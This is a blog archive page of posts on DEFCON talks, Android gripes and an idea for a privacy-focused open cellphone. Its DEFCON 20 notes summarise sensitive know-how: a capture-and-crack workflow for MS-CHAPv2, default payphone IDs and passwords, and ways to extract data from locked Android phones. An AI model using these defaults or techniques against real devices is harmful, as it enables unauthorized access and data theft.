- The slides for Nicolas Oberli’s presentation, “Please
InsertInject More Coins”, are here. - Slides and code from the Todd Manning and Zach Lanier talk, “GoPro or GTFO: A Tale of Reversing an Embedded System“, are located here.
- The GitHub repository for gitDigger, from the Jaime Filson and Rob Fuller talk, “gitDigger: Creating useful wordlists from public GitHub repositories”, is here. I have not found slides from DEFCON 21 yet, but there’s a video of the talk from BSidesLV 2013 here.
- Slides from the Jaime Sanchez presentation on “Building an Android IDS on Network Level” are here.
- Melissa Elliott has uploaded the slides from her talk, “Noise Floor: Exploring the world of unintentional radio emissions” here. Thanks to the rtl-sdr.com blog for the heads-up.
Archive for the ‘Android’ Category
And even more DEFCON 21 links: August 9, 2013.
Friday, August 9th, 2013DEFCON 21 update: August 5, 2013.
Monday, August 5th, 2013Yeah, I know, I’ve been quiet. Much of Friday’s blogging time was eaten by Bluehost instability, and Saturday and Sunday were busy.
But I do have some updates and links.
- Slides for Benjamin Caudill’s “Offensive Forensics – CSI for Bad Guys” are here. See also his post on the Rhino Security Labs blog.
- Amber Baldet has a post up with links to the slides from her “Suicide Risk Assessment & Intervention Tactics” talk, and some additional resources. I’m not on Twitter, so I can’t add to the support she’s been getting there. But I will say, again: thank you, Amber, for doing this.
- Amir Etemadieh and the other Google TV hackers have a page up at the GTVHacker site with slides and resources from their DEFCON 21 presentation, “Google TV or: How I Learned to Stop Worrying and Exploit Secure Boot”. There is also a blog entry that (I think) gives a little more context to the slides.
- Dan Crowley, David Bryan, and Jennifer Savage have slides, a white paper, and sample code from their presentation at Black Hat, “Home Invasion 2.0 – Attacking Network-Controlled Consumer Devices” up at the Black Hat site. From the descriptions, I assume tha the DEFCON 21 version is very similar to the Black Hat one.
- Chris Valasek and Charlie Miller have a blog entry up at IOActive with links to the content and their white paper on “Adventures in Automotive Networks and Control Units”.
- The LMG Security blog has a post up with links to the white paper and source code from the Sherri Davidoff/Randi Price/David Harrison/Scott Frethem talk, “Do-It-Yourself Cellular IDS”.
- Ryan W. Smith has a post up at the Lookout blog about the talk he did with Tim Strazzere, “DragonLady: An Investigation of SMS Fraud Operations in Russia”. That post, in turn, links to the white paper summarizing their presentation.
- I haven’t found the DEFCON slides for Joseph Paul Cohen’s “Blucat: Netcat For Bluetooth” presentation yet. But here’s the Blucat SourceForge page, which includes slides from a couple of other conferences, and the source code, and Mac OS X binaries for 10.6 and 10.8. Wow. I got more than what I asked for. (Edited to add 8/6: Mr. Cohen has added the DEFCON 21 slides. Praise be unto him, and may flights of angels sing him to sleep.)
- The slides for Aaron Bayles’ “Oil and Gas Infosec 101” talk are here.
I’m going to cut things off here for right now. I’m still trying to find links to some of the other presentations I mentioned (in particular, I’d love a link of some sort to Anch’s “Pentesters Toolkit” if anyone has one) and will post updates as they come in. Depending on what I dig up, there may be a second post tomorrow. In the meantime, this should keep you busy.
DEFCON 21: -1 day notes.
Wednesday, July 31st, 2013Just because I’m not going to DEFCON 21 doesn’t mean I can’t try to cover it. From 1,500 miles away. Sort of half-assedly.
DEFCON hasn’t even started yet, but Black Hat is going on, and some stuff is coming out. The biggest story so far has been Barnaby Jack’s death. I haven’t mentioned it previously because I’ve felt like it was well covered elsewhere (even FARK).
Another “big” (well, I think it is) story that I haven’t seen very much coverage of is the phone cracking bot. Justin Engler (@justinengler on Twitter) and Paul Vines, according to the synopsis of their talk and the linked article, built a robot for under $200 that can brute force PINs. Like the one on your phone.
This is one I’ll be keeping an eye on.
Borepatch is in Vegas this year, attending both Black Hat and DEFCON. He’s got a couple of posts up: a liveblog of the NSA director’s presentation at Black Hat, and another post about the links between black hats and political candidates.
So the DEFCON schedule is up. If I was going, what would get me excited? (I’ve included the Twitter handles of the speakers from the DEFCON 21 schedule information; I figure this gives a central source for looking up someone’s feed and getting copies of their presentation.)
From Thursday’s talks: I’d probably go to “Hacker Law School“, as I’m a frustrated wanna-be lawyer anyway. Why not?
Anch’s (@boneheadsanon) “Pentesters Toolkit” talk makes my heart skip a beat:
Push some more of my buttons, please.
The Aaron Bayles (@AlxRogan) “Oil and Gas Infosec 101” talk kind of intrigues me, but it would depend on my mood at the time as to whether I went to that one, or skipped out for a break.
Likewise with the Beaker and Flipper talk on robot building: yeah, robot building is something I’m interested in doing, but I might just be in a mood to visit the Atomic Testing Museum instead, and read your slides later. Nothing personal: I’m sure it will be a great talk.
I’m intrigued by the ZeroChaos (@pentoo_linux) panel on the Pentoo LINUX distribution for penetration testing. I’m not sure how that differs from, say, BackTrack, but I’d probably show up just so I could find out.
The “Wireless Penetration Testing 101 & Wireless Contesting” talk by DaKahuna and Rick Mellendick (@rmellendick) hits yet another of my hot buttons. I can’t tell from the description how much of this is going to be describing contests in the Hacker Village, and how much will be practical advice, but I’d show up anyway.
That takes us into Friday. Just from a preliminary look at the schedule, it looks like the big thing this year is hacking femtocells. Doug DePerry (@dugdep) and Tom Ritter (@TomRitterVG) are doing a talk on “I Can Hear You Now: Traffic Interception and Remote Mobile Phone Cloning with a Compromised CDMA Femtocell”:
The Charlie Miller (@0xcharlie) and Chris Valasek (@nudehaberdasher) talk, “Adventures in Automotive Networks and Control Units“, sounds interesting as well. I’m just slightly more interested in femtocells than automotive hacking, so apologies to Mr. Miller and Mr. Valasek: if the two weren’t in conflict, I’d hit your talk for sure.
And if you haven’t been to a software defined radio talk, Balint Seeber’s (@spenchdotnet) sounds promising.
“The Secret Life of SIM Cards” by Karl Koscher (@supersat) and Eric Butler (@codebutler) intrigues me the most out of the 11:00 talks. And I’m kind of interested in the Ryan W. Smith (@ryanwsmith13) and Tim Strazzere “DragonLady: An Investigation of SMS Fraud Operations in Russia” presentation because, well…
There’s not much that intrigues me after Benjamin Caudill’s (@RhinoSecurity) presentation on “Offensive Forensics: CSI for the Bad Guy“. If I was at DEFCON, this is the time where I’d probably be browsing the dealer’s room, though I might go to the Amir Etemadieh (@Zenofex)/Mike Baker (@gtvhacker)/CJ Heres (@cj_000)/Hans Nielsen (@n0nst1ck) Google TV panel: these are the same folks who did the Google TV talk at DEFCON 20.
I feel kind of conflicted at 4:00. The Daniel Selifonov talk, “A Password is Not Enough: Why Disk Encryption is Broken and How We Might Fix It” sounds interesting. But I’m also intrigued by the “Decapping Chips the Easy Hard Way” with Adam Laurie and Zac Franken. Decapping chips is something I’ve been fascinated by, and it looks like Adam and Zac have found methods that don’t involve things like fuming nitric acid (and thus, are suitable for an apartment).
This is also the time when we, once again, present the “Hippie, please!” award to Richard Thieme for “The Government and UFOs: A Historical Analysis“.
I’m slightly intrigued by Nicolas Oberli’s (@Baldanos) talk about the ccTalk protocol, “Please Insert Inject More Coins”:
Saturday morning, we have the second femtocell talk, “Do-It-Yourself Cellular IDS”, by Sherri Davidoff (@sherridavidoff), Scott Fretheim, David Harrison, and Randi Price:
Opposite that, and worth noting, are the annual Tobias/Bluzmanis lock talk, and the David Lawrence et al talk on using 3D printers to defeat the Schlage Primus.
More than likely, I’d hit the Daniel Crowley et al (@dan_crowley) talk, “Home Invasion 2.0 – Attacking Network-Controlled Consumer Devices“, and the Philip Polstra (@ppolstra) presentation “We are Legion: Pentesting with an Army of Low-power Low-cost Devices“. I’m particularly intrigued by the Polstra talk, as one of my areas of interest is how small can we make devices that can still do useful hacking? What’s the smallest feasible wardriving system, for example?
I do want to give Jaime Sanchez (@segofensiva) a shout-out for his talk on “Building an Android IDS on Network Level“. This is worth watching.
I’d have to go to the Phorkus (@PeakSec)/Evilrob “Doing Bad Things to ‘Good’ Security Appliances” talk:
Because, tape! But the Wesley McGrew “Pwn The Pwn Plug: Analyzing and Counter-Attacking Attacker-Implanted Devices” talk also interests me.
The PIN cracking device talk is on Saturday, opposite Amber Baldet’s (@AmberBaldet) talk on “Suicide Risk Assessment and Intervention Tactics“. I’m glad DEFCON accepted her talk, and I am looking forward to seeing the presentation online.
Also noteworthy, I think: James Snodgrass and Josh Hoover (@wishbone1138) on “BYO-Disaster and Why Corporate Wireless Security Still Sucks“.
Todd Manning (@tmanning) and Zach Lanier (@quine) are doing a presentation on “GoPro or GTFO: A Tale of Reversing an Embedded System“. I don’t have a GoPro (yet) or much of a use for one (yet) but I think they are interesting devices, so I’ll be watching for slides from this talk. Same for the conflicting Melissa Elliott talk, “Noise Floor: Exploring the World of Unintentional Radio Emissions“.
This takes us to Sunday. There’s not a whole lot that really turns me on early, though I admit to some interest in the Jaime Filson/Rob Fuller talk on harvesting github to build word lists:
I like the idea behind John Ortiz’s “Fast Forensics Using Simple Statistics and Cool Tools“, and he teaches at the University of Texas – San Antonio, so I’d probably go to that.
Now is when things start heating up from my perspective. Joseph Paul Cohen is giving a talk on his new tool, “Blucat: Netcat For Bluetooth“:
Holy crap, this sounds awesome. All I ask for is code that compiles.
(Unfortunately, this is up against the Eric Robi (@ericrobi)/Michael Perklin talk on “Forensic Fails“, which sounds like fun. But Bluetooth hacking is a big area of interest for me; sorry, guys.)
Speaking of Bluetooth hacking, Ryan Holeman (@hackgnar) is doing a talk on “The Bluetooth Device Database”. Which is exactly what it sounds like:
Dude lives in Austin, too! Holy crap^2!
And that takes us through to the closing ceremonies and the end of DEFCON 21. I will try to link to presentations as they go up, significant news stories, other people’s blogs, and anything else I think you guys might be interested in. If you have specific requests or tips, please either let me know in comments or by email to stainles at mac dot com, stainles at gmail dot com, or stainles at sportsfirings dot com.
I went back to Ohio, but my city was gone.
Monday, July 15th, 2013Well, not really “gone”. I hadn’t been back to Ohio for nine years, and it amazed me somewhat both how much and how little has changed.
For example, there’s an entire grocery chain that I don’t remember from my last trip…that takes the Discover card and cash. No Visa/AmEx/MasterCard/Diner’s Club, not even debt cards with a PIN, just cash and Discover. Who came up with this idea?
On the other hand, the tractor tire store that was a landmark on the way to Grandma’s place is still there, after 40 something years. And Grandma’s place still feels remote from everything, even though there’s major strip centers at the end of her road, and even though much of the land was sold off over the past few years (and now has houses sitting on it).
And the old NASA hanger is still visible from the airport. That was another landmark for us kids. (My dad worked there, back when it was still the Lewis Research Center, before it was renamed “NASA John H. Glenn Research Center at Lewis Field“. Which is a mouthful. Not that I’m bitter or anything over the renaming; by gosh, if anyone deserved to have a NASA facility named after him, it was John Glenn.)
This is shaping up to be a long post, and sort of “stream of consciousness”, so I’m going to put the rest of it behind a jump. Before I do, here’s Grandma’s obituary, just for the record.
Here in my car, I can’t make a call, because the system doesn’t work at all…
Saturday, June 29th, 2013More:
Why do you need cars signaling that their windshield wipers are on to warn of a rainstorm ahead? I have a close friend who recently bought a 2013 Ford: it has weather information integrated into the navigation system. As I recall, his 2011 Ford had the same feature.
But my primary reason for blogging this is so I can link to episode 11 of the Neutral podcast, in which John Siracusa, Marco Arment, and Casey Liss discuss why car software stinks. I think all of the Neutral podcasts are worth listening to, but if you’re only going to listen to one, this is the one I’d recommend.
Another question for the huddled masses.
Friday, May 17th, 2013Why do Android podcast clients suck?
I’ve written previously about my experience with the awful Pocket Casts application.
I dumped that and started using Google Listen. Google Listen frequently fails to completely download all of a podcast (so you end up with one in the queue that’s cut short, without any warning), frequently hangs up when trying to add a new podcast, and is no longer supported or maintained by Google. (Edited to add: Also, my phone frequently reboots while Google Listen is running, but I’m not sure if that is a Google Listen problem or a problem with some other application.)
I downloaded BeyondPod for my Kindle Fire. The free version (which I am using) has some limitations: you can’t set up automatic updates to your podcast feeds, nor can you download more than one podcast at a time. In order to activate those features, you have to pay $6.99 for an unlock code. Personally, I think that’s a bit steep for a podcast client, but if BeyondPod actually did what I wanted it to do, I’d pay that.
However, BeyondPod has a couple of what I consider to be crippling issues:
- I find the user interface to be completely counter-intuitive. For example, if I have a podcast on my playlist, playing, and I want to switch to the player controls (to rewind, pause, or fast forward) I can’t figure out how to do that. Sometimes BeyondPod will display player controls underneath the playlist, other times it doesn’t. Sometimes you can swipe up and see the controls for the specific podcast; sometimes you can’t. There seems to me to be no rhyme or reason to what controls BeyondPod displays when and where, and how to get from one set of controls to another.
- Then there’s my personal favorite BeyondPod “feature”. If you have a playlist, and you’re looking at the feeds for a podcast (say, you want to read the notes on a specific podcast), and you accidentally touch in the wrong place, BeyondPod starts playing the podcast you’re looking at. This makes sense. What doesn’t make sense is that BeyondPod also wipes out your existing playlist. Oh, you wanted to listen just to that podcast, or you missed the touch target and didn’t intend to play that podcast at all? Too bad, so sad, rebuild your playlist. That’s a deal breaker for me; no, I will not pay you $7 for a podcast client that erases my playlists.
All I want out of a podcast client is a few basic, simple things:
- Maintain a feed of the podcasts I want to listen to.
- Reliably download those podcasts. If a podcast fails to completely download, either warn me or retry until it does.
- Let me mark podcasts as listened or not listened.
- Let me fast forward/rewind within the currently playing podcast.
- Let me have a playlist of podcasts that I can easily rearrange.
That’s pretty much it. There are some other features that would be nice (ability to sync across multiple platforms, for example) but not essential to me. So why is this so hard?
Android fans constantly bash Apple and iTunes. Yes, iTunes has problems, most of which involve trying to put too many functions into one piece of software. But for all the problems iTunes has, it is at least capable of doing all of the things on my minimum list. I can’t say that for any Android client I’ve tried so far.
Ring ring ring, open phone.
Monday, April 29th, 2013Great and good friend of sportsfirings.com and valued commenter lelnet left a long comment on last night’s cellphone post. Because his comment represents a lot of work and thought (and I believe in rewarding hard work) and because I’m afraid it will get lost in the shuffle, I’m promoting it to a blog post (with his permission).
You can already buy, off the shelf at Fry’s, a “phone” that does essentially what you’re talking about, using available wi-fi networks to connect with Skype and make calls through that, without any involvement of the cell providers. (Yes, I know…Skype is a proprietary protocol and would be unacceptable to Stallman. The firmware is also closed. But since it’s provably _possible_, one could do it with open standards if one saw a market.)
The problem is that it doesn’t scale well. Getting a reliable wi-fi signal is pretty easy…in the sorts of places one is likely to have access to a _wired_ phone whenever one wants one. Building a wi-fi network that covers the places one actually needs mobile connectivity from is a massively harder problem, due to the range limitations of unlicensed spectrum.
It _might_ be possible to do it using amateur frequencies, _if_ you could get regulatory approval to open those up to use by the general public. Which, of course, would involve fighting off both the whole telco industry and at least 80% of the amateur radio community. Considering that the latter group is where you’d be trying to recruit most of your network engineers from, it seems like it’d be a bad idea to begin your plan by irrevocably pissing them off, even if you magically assume that you’ll be able to out-muscle the telcos in Washington.
The last mile is a hard problem on several different dimensions, some of them physical and some of them political. But there is something you _could_ do…
Build an Android (or, if you like, Replicant) phone, pre-configured to send all its traffic through an encrypted VPN to an anonymizing end-point. Purchase connectivity for it on an existing cell carrier’s prepaid plan. Disable the cellular voice service, and have it send and receive calls exclusively through VoIP connectivity to an Asterisk or FreeSwitch server, either run by the same entity that does your anonymizer, or run yourself on a cheap colo server stuck in a rack in some country you doubt is ever going to care enough to spy on you.
Your cell provider can easily determine that Charles Udall Farley (or whatever name you gave them when you signed up…it’s prepaid, so it’s not like the name you give has to pass a credit check) pushes a lot of data around, but they’d have no way of inspecting the content. They’d have a record of Mr. Farley’s movements around their network, but no way to associate that with you, or even with the phone number you make and receive calls on. An Open Source OS on the phone addresses the “remote bugging” fears. It doesn’t depend on you personally running any software that RMS would find objectionable. And since you can make and receive calls from anywhere that you’re able to get a data signal off a cell tower, it’s still useful if your car breaks down by the side of the road, instead of just in your home and office, like a wi-fi-only device would be.
(I came up with this plan for a team of spies in a novel my wife is writing. But although to my knowledge no such phone exists today, there’s absolutely no barrier to someone building one tomorrow. And both the technologies and the services required to support the back-end of it are already available for purchase in the real world right now, at prices comparable to or better than what people who already had cell phones in the mid-90s were paying for service then.)
The only thing I’d add to this is that I, personally, have no interest in pissing off the amateur radio operators out there; both because it is not good strategy, as lelnet notes, and because I happen to be one myself. (KF5BFL, in case anyone was wondering, but don’t look for me; I don’t have any transmitting equipment at the moment.)
We’ve got computers, we’re tapping phone lines, I know that ain’t allowed…
Sunday, April 28th, 2013Two things collided in my head last week. After I picked up the wreckage, I thought there might be a worthy blog post in the aftermath.
(Picking up the wreckage took a while, because the week was so busy. At least nobody took part of a locomotive through the eye. Anyway, I apologize if this is old news.)
Thing one: Andrew Huang’s post on the $12 Gongkai phone (by way of LWN). It doesn’t come as any great shock to me that cellphone hardware has become cheap: at last year’s DEFCON, the Ninja Networks party invitations were fully functional cellphones. (I do not know what the Ninja Networks cost per phone was: as I recall, the Ninjas stated they got substantial financial and technical support from Qualcomm. However, the fact that the phones were cheap enough to pass out as party invites is significant in and of itself, in my ever so humble opinion.)
Thing two: Dr. Richard Stallman and his position on cell phones. I don’t want to reopen the whole debate on whether Stallman is a hypocrite for not having a cell phone but being willing to use other people’s phones. Rather, I want to ask a not-so-simple simple question: is it possible to build a phone that overcomes Stallman’s objections?
Well, it looks like we can put together a cellphone computer for about $12. Maybe less. I don’t see any reason to think that someone (more likely, a small group of someones) could put together a reference hardware spec for an open cellphone, complete with schematics, PCB layouts, and a parts list. I know I don’t have the skills or equipment to do SMD soldering, and I wouldn’t ask, say, my mother to build a phone from a kit either. But it is just as easy for me to visualize a scenario where some organization (say, the FSF) contracts with a manufacturer to build phones from the reference design, with an organizational seal of approval. They could sell the phones outright, or offer them as a premium for donations: I think I’d give at least $50 to FSF for a phone like the one Huang describes. Add WiFi, GPS, a color screen and a camera and I’d go up to $100, possibly more depending on my mood, the phase of the moon, and other factors.
But we need an operating system for our cellphone computer, right? Right. Android is open source. Note well, however, that there is a difference between “free software” and “open source software”, and that these are not equivalent concepts. But it seems pretty easy to imagine (as long as were are imagining) a fork of Android that is truly “free” by the FSF definition. As a matter of fact, we don’t even have to imagine; while I was researching this post, I stumbled across Replicant, which is exactly that.
I’ll deal with the second objection first. With a truly open source and free OS, I think you can pretty much eliminate the capacity for remote bugging. As to the first objection, I don’t see a way around that. It seems pretty clear that the phone system has to know where your phone is for you to make calls and get calls. But: if the system only stores that information for the minimum necessary length of time, and discards it after the call is completed, is that good enough for Stallman?
(Even if you’re not actively engaged in a call, I think the network still has to know what cell you’re in. But could the network only store your current cell, and not the history of cells you’ve been through?)
(From this point forward, I’m going to refer to this idea as the “open” network. Calling it the “free” network carries with it the connotation that people aren’t paying for it. I’ll come back to that.)
Okay. So we expect AT&T and Sprint and Verizon and T-Mobile and the Grace L. Ferguson Cell Phone and Storm Door Company not to store this information. Right. I’ll wait for you to finish laughing.
Done? Okay. So we not only need consumer hardware, we need an entire “open” cell phone network. Is that something that could be reasonably built? Well, we need radio spectrum. It is unlikely that the carriers will give up spectrum for an “open” network. So what do we do? Could we use amateur radio frequencies, like the 2390-2450 MHz band? Is it even possible that local amateur radio groups could set up and maintain cells in their local areas? (I don’t imagine the equipment to set up a cell is cheap, but I also don’t imagine it is beyond the reach of a group of talented amateur radio operators with a GNU software radio. And if the equipment becomes widespread, the prices should go down. I hope.)
Could you even do away completely with the cell network, and just run all the communications over IP? You’d need to be associated with an access point, but aren’t most folks near one at home or at work most of the day? Would it be possible for amateur radio operators to set up networks of access points along major urban corridors? WiFi hardware is even more of a commodity item than cell hardware, and there are protocols for linking access points together or doing mesh networks.
Someone has to pay for this, right? Right. We don’t want movements and activity tracked, but I don’t see any philosophical problem with a simple lookup based on each phone’s unique identifier. All you need is one bit to indicate the customer is paid up and entitled to use the network. As for the actual cost and billing, it seems to me that can be handled by systems outside the network. If you’re giving unlimited everything for one flat fee, you don’t need to track anything except paid or unpaid. If you want to start getting into per voice minute or per KB data charges, it seems to me that you can still track usage (minutes, KB, or texts) without tracking activity and bill based on usage. The money from service fees could, in turn, be routed to the cell providers. I’m sure we could come up with a fair way of doing this; for example, X cents per call routed through an individual cell. Busier cells get more money, which they can invest in upgrading service; more remote cells probably have lower demand, and don’t need the same capacity.
(One big problem if you’re using amateur radio frequencies: FCC regulations prohibit “communications in which the operator has a pecuniary interest, including communications on behalf of an employer“. There’s a strong tradition, in addition to the FCC regulations, against using the amateur radio bands for business purposes. One could argue that this kind of network wouldn’t be a business, though; rather, it would be a maintained as a public service, and the money that comes in would go back out to local amateur organizations to cover their cost of maintaining cells. I sort of see this in the same way as I do the repeaters maintained by some amateur radio clubs for the use of their members.)
So I said this was a not-so-simple simple question. Basically, what I don’t know about cell phones and cell technology could fill books. (Indeed, it has filled books, which are located in places called “bookstores” and “libraries”. But I digress.) I think I’ve outlined a possible path to an “open” network, but I acknowledge the limits of what I know. I would welcome criticism from people who know more than I do: those who work in the industry, computer security experts, and heck, even cyberpunk writers.
I mention cyberpunk writers for a reason. Maybe I am over-romanticizing this a bit, but I have this mental image of guys in the Sprawl with “open” cellphones spread out on blankets in the street, and gangs like the Panther Moderns using those phones. A guy can dream, can’t he?
(Subject line hattip: the greatest rock song ever, by the greatest band ever. Like you needed it anyway.)
Edited to add: I knew there was something I was forgetting. How reliable would this network be? After all, AT&T spends hundreds of millions of dollars a year on their network, where what I’m talking about here is something that is, at best, a fringe network primarily used by people highly concerned with privacy, and possibly maintained by amateurs on a spare time basis. On the other hand, AT&T spends hundreds of millions of dollars a year on their network. Enough said.
My inclination is to say that you could probably build something that’s “good enough”. You might not be able to get to the same level of service as, say, Verizon, but you could probably get to a level of service where people are willing to make the tradeoff between guaranteed privacy and a small amount of inconvenience. I think this is one place where my plan is weak.
Edited to add 2: 1500 words? I haven’t written like this since I was in college. In other words, last year.
Night thoughts.
Saturday, March 23rd, 2013Some folks may have noticed that I haven’t been doing as much bread blogging recently. That’s because I haven’t been baking as much bread; I’ve been a little tied up with some family things. Nothing serious, nothing health related, and things are winding down. But it has distracted me a little from the bread machine. I’m going to try to do another one of Laurence Simon’s recipes this week, but I’m not sure which one.
In other news, I’m trying to get back on my bike. I have a Trek 7500 that I bought several years ago, and which sat idle pretty much the entire time I was going to St. Ed’s. I took it in last week and had it cleaned, lubed, and tuned; now I just have a series of petty annoyances I’m working my way through. (I couldn’t find my water bottles, so I bought replacements. You can’t have too many water bottles, anyway. Then I couldn’t find my bike shoes: I can ride the Trek in my normal sort of half-boot half-sneaker shoes, but it isn’t as efficient. REI had some Shimano SH-MT33L
(Side note: I bought my bike at Freewheeling Bicycles. Why? Lawrence bought his there. I’m happy I followed his lead. The total bill to get my bike out of hock last week was about $104. That price included $8 for a rear tube, and another $45 for a rear bike rack. I want to start making grocery store trips on the bike, rather than the car, so I bought the rack and plan to sling some panniers over it at some point. Since I bought the bike there, Freewheeling gave me a 25% discount on labor, so the whole thing ended up being much more reasonable than I expected. Consider this an endorsement of Freewheeling.)
(Side note 2: F–k Sun and Ski Sports, the horse they rode in on, and any horse that looks anything like the horse they rode in on.)
As a geek, one of the things I’ve always wanted to when I was riding was to log and track my rides. I have a cheap-ass bike computer with basic functionality: current and average speed, distance on current ride, odometer, and clock. But I’ve always wanted to be able to overlay my ride log onto a map and see where I’ve ridden, as well as getting elevation data. My feeling is that being able to do that gives me a tangible sense of progress, which gives me more motivation to ride. But those capabilities require GPS.
I’m still looking for work so I can’t (and don’t want to) spend $330 on a Garmin Edge 510
Here’s the thing: I’m smart. S-M-R-T. Smart. And not only am I smart, but! I have a smartphone! That has a GPS built in! And that runs apps! And, yes, there are cycling apps available! The big ones on Android seem to be MapMyRide and Strava, but I’ve also seen people say that MyTracks works quite well for cycling applications. And I already have MyTracks installed. And I already take my cellphone with me when I ride anyway, in case of emergency. Now all I have to do is get it properly rigged and I should have almost everything I need. (The last remaining piece is some cycling shorts with pockets. I’ve blown out the waistband on the one pair I have; whenever I put them on, they slide off my ass. This is not good for cycling purposes, or for staying off the sex offender registry purposes.)
(I got into a discussion with a friend of mine about Android/iPhone cycling apps. My friend’s position is that the dedicated cycling computers like the Garmin Edge line are preferable to using your phone for this purpose. His feeling is that running the GPS on the phone and logging data eats battery power, and your phone may run out of juice before you finish the ride. My feeling is: I’m not a high-speed low-drag road biker. I’m usually not out for more than an hour or two. If I start out with a fully charged battery, I feel like I should be able to run MyTracks for at least two hours without worry. We’ll test this theory once I get everything rigged for silent running. If I was doing the kind of thing he talks about doing, such as riding the Great Divide Mountain Bike Route 12 hours a day for ten weeks, I’d reconsider my position.)
Thinking about this some more, I wonder what the market for higher-end bike and running computers like the Garmins is today. Let’s see: I can pay $330 for the Edge 500. Or I can pay $196 for a HTC EVO V 4G
If any of my readers have experience with cycling apps like the ones I’ve mentioned (or others: I’m still running an Android phone, but iPhone users are welcome too) please feel free to leave a comment, or drop me an email if you’d prefer. Contact information is in the place where it says “Contact”.
To hell with Best Buy.
Sunday, January 6th, 2013Battery life on my Android phone has always been an issue.
Not too long ago (I think slightly more than a year) I bought a 1750 mAh hour battery from Best Buy. That worked okay for a while, but over the past few days, it has become clear that battery is dying.
“No problem,” I thought. “I’ll get another one from Best Buy.”
Went to Best Buy. Looked for batteries. Couldn’t find any. Got a clerk’s attention.
Best Buy no longer carries any cell phone batteries. At all. They’ve got car chargers. They’ve got cases out the wazoo. But no batteries for any cell phones, even the ones they currently sell.
The clerk told me “go to Batteries Plus”.
(Batteries Plus wanted $43 for a standard capacity Evo 4G battery, and didn’t have any 1750 mAh batteries. Screw that. I can get two 2000 mAh batteries from Newegg for $11.29. And I still have my original Evo 4G battery, plus a 3500 mAh battery that I paid $4.99 for a while back. I haven’t been using the 3500 mAh one because it is a physically larger battery that requires putting a custom back on the phone (included with the original purchase), which would in turn require removing the case I have on the phone. But it is there if I need it while I wait for the Newegg ones to come in.)
(Yes, I know it was CompUSA, not Best Buy, but this is still obligatory.)
The map is not the territory.
Monday, October 1st, 2012I was going to the destination for Saturday’s Saturday Dining Conspiracy. So, of course, I put the address into the new IOS6 mapping application on my shiny new iPhone 5.
The phone routed me to a shopping center across a major highway and, I’d estimate, about .3 miles from where the restaurant actually was.
Oh, wait. Did I say “IOS6 maps” and “shiny new iPhone 5”? I’m sorry. I meant to say “Google Navigation” and “my two-year-old HTC EVO running Android”.
Point being: Apple’s new Maps may not be up-to-spec, but I’ve personally run into problems with Google Maps/Google Navigation on my phone as well. Apple gets all the attention now, probably because new! shiny! but the claimed perfection of Google does not exist.
(As I said above, I use an HTC Evo on Sprint. Now that I’m off contract, I am considering an iPhone 5, mostly because I’m not totally happy with Android as an environment and as an ecosystem, as well as not very much liking the Sprint add-ons. As I’ve said elsewhere before, I work professionally with Windows and UNIX based operating systems, my main home computers are Macs, and my laptop is a netbook running Ubuntu. I don’t have a dog in the platform wars, and I don’t really give a damn what you use, or what you think of other people who use a different platform.)
I am disgusted.
Thursday, August 2nd, 2012It is 3:00 PM local time on Ice Cream Sandwich Day, and nobody has brought me my Android 4.0 tablet yet.
DEFCON 20 notes: day 2.
Sunday, July 29th, 2012Note: I’ve updated the day 1 notes with a couple of things I forgot to include last night.
“Defeating PPTP VPNs and WPA2 Enterprise with MS-CHAPv2“:MS-CHAPv2 is a wildly popular authentication protocol. For example, DEFCON’s “secure” network uses MS-CHAPv2. People have been attacking CHAP for a while now, but most of the attacks are dictionary attacks, where you use asleap and throw a word list at it, hoping the user picked a weak password.
So is MS-CHAPv2 security password dependent? That’s a reasonable assumption, but not true.
If you look at the details of the MS-CHAPv2 handshake (Moxie had a good visualization, which I can’t find online or I’d link to it here) there’s only one unknown: the MD4 hash of the user’s password. Everything else is sent in the clear, or can be derived from known information.
MS-CHAP does a series of three DES encryptions on the user password. But it isn’t 3DES: it is just three DES encryptions with three keys. One of those keys is padded so it is really only two bytes, which makes it easy to crack. The other two encryptions use the same plaintext; the end result is that the complexity of cracking MS-CHAP DES reduces to about the same as normal 56-bit DES, 2 to 56th power.
Enter the folks at Pico Computing, about whom I have written before. Pico built a machine with 48 FPGA chips, each with 40 cores running at 450 MHz, to attack DES. This machine can search the whole keyspace in about 23 hours. And Pico has come up with some clever optimizations for the FPGAs: preconfiguring memory, reducing the bus down to “key found/key not found” (since searching the keyspace is linear, if you know when the bus went to “key found”, you can figure out what the key is), and possibly just using JTAG instead of a bus.
“So what,” you say. “I don’t have a single FPGA, let alone 48 of them.”
Enter chapcrack. Do a packet capture, point chapcrack at it, and chapcrack will pull out the MS-CHAP handshake, in a handy form which you can submit to…
…CloudCracker.com, which now supports MS-CHAPv2 attacks. Estimated turn-around time is one day. Woo hoo woo hoo hoo.
(Edited to add: Added a link to a blog post by Moxie Marlinspike summarizing his and David Hulton’s (of Pico Computing) presentation 8/1/2012.)
“Exploit Archaeology: Raiders of the Lost Payphones”:More of a fun panel than a practical one, covering all the stuff the presenter went through to find documentation and tools for an old Elcotel payphone he was given. Among other things:
- The upper housing lock (which covers the internal phone mechanism, including the reset to defaults button) is a relatively easy to pick 3-pin lock (with “anti-impressioning divots”).
- The lower housing (where the money is stored) is a much harder to pick 4-pin lock. But the presenter got lucky…
- You also need a special tool, called a T-wrench, to do certain things. The presenter was able to improvise one…
So once you’ve got a payphone, what can you do with it? You can hook it to an ATA and connect to an Asterisk system, and have some fun that way. (The presenter pointed out that by law, 911 calls are required to be free. So he had some fun connecting the payphone to his Asterisk system, and configuring it so dialing 911 on the payphone got an outside line through Asterisk.)
Anyway, it turns out that there are three ways to program/reprogram these phones: there was specialized software available (Elcotel has been out of business for years, but the presenter managed to get a copy of the software, crack it, and get it running), local telemetry (where you open up the upper housing, reset the phone, and let it guide you through voice prompts for reprogramming), or remote telemetry (the phone has a modem). VOIP, by the way, is not well suited to modems.
Some notes:
- these phones have a default ID of 9999
- a default password of 99999999
- a secondary password of 88888888
- The phone ID is generally set to the last four digits of the phone number.
- And the passwords are frequently left at the default.
There’s some other fun stuff you can do with an old payphone. For example, the presenter managed to rig up his phone, a Pwn Plug, and some custom scripting into a system that allows you to run NNmap port scans over the phone. But I’ll leave details of that for his presentation when he puts it up.
“Into the Droid: Gaining Access to Android User Data“: Excellent presentation covering some of the ways you can get user data out of an Android device, even if it is locked or encrypted. For example:
- you can use the abootimg tool to create a custom boot image, intercept the phone’s bootloader, and force it to use your image.
- Special USB debug cables work on some devices.
- The salt for the lockscreen and system passwords can be pulled out of specific locations on the device and cracked with something like oclhashcat-lite. (See the presentation for specific details on where the salt and key are located.)
- Applications with no permissions can still create a root shell and send information back to an end user (by hiding data in URL parameters, for example).
